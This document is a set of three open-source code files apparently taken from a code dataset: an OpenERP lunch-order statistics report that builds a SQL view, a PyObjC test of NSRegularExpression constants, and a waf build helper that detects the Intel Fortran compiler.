darkleons/lama | addons/lunch/report/report_lunch_order.py | 341 | 2771 | # -*- coding: utf-8 -*-
##############################################################################
#
# OpenERP, Open Source Management Solution
# Copyright (C) 2004-2010 Tiny SPRL (<http://tiny.be>).
#
# This program is free software: you can redistribute it and/or modify
# it under the terms of the GNU Affero General Public License as
# published by the Free Software Foundation, either version 3 of the
# License, or (at your option) any later version.
#
# This program is distributed in the hope that it will be useful,
# but WITHOUT ANY WARRANTY; without even the implied warranty of
# MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE. See the
# GNU Affero General Public License for more details.
#
# You should have received a copy of the GNU Affero General Public License
# along with this program. If not, see <http://www.gnu.org/licenses/>.
#
##############################################################################
from openerp import tools
from openerp.osv import fields,osv
class report_lunch_order(osv.osv):
_name = "report.lunch.order.line"
_description = "Lunch Orders Statistics"
_auto = False
_rec_name = 'date'
_columns = {
'date': fields.date('Date Order', readonly=True, select=True),
'year': fields.char('Year', size=4, readonly=True),
'month':fields.selection([('01','January'), ('02','February'), ('03','March'), ('04','April'),
('05','May'), ('06','June'), ('07','July'), ('08','August'), ('09','September'),
('10','October'), ('11','November'), ('12','December')], 'Month', readonly=True),
'day': fields.char('Day', size=128, readonly=True),
'user_id': fields.many2one('res.users', 'User Name'),
'price_total':fields.float('Total Price', readonly=True),
'note' : fields.text('Note', readonly=True),
}
_order = 'date desc'
def init(self, cr):
tools.drop_view_if_exists(cr, 'report_lunch_order_line')
cr.execute("""
create or replace view report_lunch_order_line as (
select
min(lo.id) as id,
lo.user_id as user_id,
lo.date as date,
to_char(lo.date, 'YYYY') as year,
to_char(lo.date, 'MM') as month,
to_char(lo.date, 'YYYY-MM-DD') as day,
lo.note as note,
sum(lp.price) as price_total
from
lunch_order_line as lo
left join lunch_product as lp on (lo.product_id = lp.id)
group by
lo.date,lo.user_id,lo.note
)
""")
# vim:expandtab:smartindent:tabstop=4:softtabstop=4:shiftwidth=4:
| agpl-3.0 |
ariabuckles/pyobjc-framework-Cocoa | PyObjCTest/test_nsregularexpression.py | 3 | 1868 | from PyObjCTools.TestSupport import *
from Foundation import *
class TestNSRegularExpression (TestCase):
@min_os_level('10.7')
def testConstants10_7(self):
self.assertEqual(NSRegularExpressionCaseInsensitive, 1 << 0)
self.assertEqual(NSRegularExpressionAllowCommentsAndWhitespace, 1 << 1)
self.assertEqual(NSRegularExpressionIgnoreMetacharacters, 1 << 2)
self.assertEqual(NSRegularExpressionDotMatchesLineSeparators, 1 << 3)
self.assertEqual(NSRegularExpressionAnchorsMatchLines, 1 << 4)
self.assertEqual(NSRegularExpressionUseUnixLineSeparators, 1 << 5)
self.assertEqual(NSRegularExpressionUseUnicodeWordBoundaries, 1 << 6)
self.assertEqual(NSMatchingReportProgress, 1 << 0)
self.assertEqual(NSMatchingReportCompletion, 1 << 1)
self.assertEqual(NSMatchingAnchored, 1 << 2)
self.assertEqual(NSMatchingWithTransparentBounds, 1 << 3)
self.assertEqual(NSMatchingWithoutAnchoringBounds, 1 << 4)
self.assertEqual(NSMatchingProgress, 1 << 0)
self.assertEqual(NSMatchingCompleted, 1 << 1)
self.assertEqual(NSMatchingHitEnd, 1 << 2)
self.assertEqual(NSMatchingRequiredEnd, 1 << 3)
self.assertEqual(NSMatchingInternalError, 1 << 4)
@min_os_level('10.7')
def testMethods10_7(self):
self.assertArgIsOut(NSRegularExpression.regularExpressionWithPattern_options_error_, 2)
self.assertArgIsOut(NSRegularExpression.initWithPattern_options_error_, 2)
self.assertArgIsBlock(NSRegularExpression.enumerateMatchesInString_options_range_usingBlock_,
3, b'v@' + objc._C_NSUInteger + b'o^' + objc._C_NSBOOL)
self.assertArgIsOut(NSDataDetector.dataDetectorWithTypes_error_, 1)
self.assertArgIsOut(NSDataDetector.initWithTypes_error_, 1)
if __name__ == "__main__":
main()
| mit |
abantam/pmtud | .waf-1.7.13-5a064c2686fe54de4e11018d22148cfc/waflib/Tools/ifort.py | 330 | 1460 | #! /usr/bin/env python
# encoding: utf-8
# WARNING! Do not edit! http://waf.googlecode.com/git/docs/wafbook/single.html#_obtaining_the_waf_file
import re
from waflib import Utils
from waflib.Tools import fc,fc_config,fc_scan,ar
from waflib.Configure import conf
@conf
def find_ifort(conf):
fc=conf.find_program('ifort',var='FC')
fc=conf.cmd_to_list(fc)
conf.get_ifort_version(fc)
conf.env.FC_NAME='IFORT'
@conf
def ifort_modifier_cygwin(conf):
raise NotImplementedError("Ifort on cygwin not yet implemented")
@conf
def ifort_modifier_win32(conf):
fc_config.fortran_modifier_win32(conf)
@conf
def ifort_modifier_darwin(conf):
fc_config.fortran_modifier_darwin(conf)
@conf
def ifort_modifier_platform(conf):
dest_os=conf.env['DEST_OS']or Utils.unversioned_sys_platform()
ifort_modifier_func=getattr(conf,'ifort_modifier_'+dest_os,None)
if ifort_modifier_func:
ifort_modifier_func()
@conf
def get_ifort_version(conf,fc):
version_re=re.compile(r"ifort\s*\(IFORT\)\s*(?P<major>\d*)\.(?P<minor>\d*)",re.I).search
cmd=fc+['--version']
out,err=fc_config.getoutput(conf,cmd,stdin=False)
if out:
match=version_re(out)
else:
match=version_re(err)
if not match:
conf.fatal('cannot determine ifort version.')
k=match.groupdict()
conf.env['FC_VERSION']=(k['major'],k['minor'])
def configure(conf):
conf.find_ifort()
conf.find_program('xiar',var='AR')
conf.env.ARFLAGS='rcs'
conf.fc_flags()
conf.fc_add_flags()
conf.ifort_modifier_platform()
| gpl-2.0 |
Subsets and Splits
No community queries yet
The top public SQL queries from the community will appear here once available.